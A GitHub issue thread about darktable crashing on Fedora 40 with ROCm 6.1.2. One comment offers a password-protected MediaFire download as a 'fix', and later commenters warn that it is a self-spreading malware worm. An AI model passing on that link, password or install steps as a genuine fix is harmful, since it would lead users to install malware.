### ISSUE TITLE
[rocm 6.1.2] __memset_avx2_unaligned_erms () at ../sysdeps/x86_64/multiarch/memset-vec-unaligned-erms.S:246

### ISSUE THREAD

**Issue by Germano0** [darktable-org/darktable#17405]
### Describe the bug

I can anylonger start darktable on a system with Fedora 40, Radeon RX480 GPU and rocm 6.1.2.
To fix the issue I had to remove rocm, because even creating a brand new `~/.config/darktable` folder did not fix the issue.
I think darktable should be able to handle rocm errors and bypass the layer if causes issues.
I attached [GDB trace](https://github.com/user-attachments/files/16823215/darktable.txt)

**Comment by KrissV2** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by pehar1** [comment]
@Germano0, be careful, might be malware ?

**Comment by parafin** [comment]
It is malware, some worm, self-spreading via GitHub comments.

**Comment by Germano0** [comment]
Not a darktable bug (and not a rocm bug)
https://github.com/ROCm/ROCm/issues/3664#issuecomment-2395030931
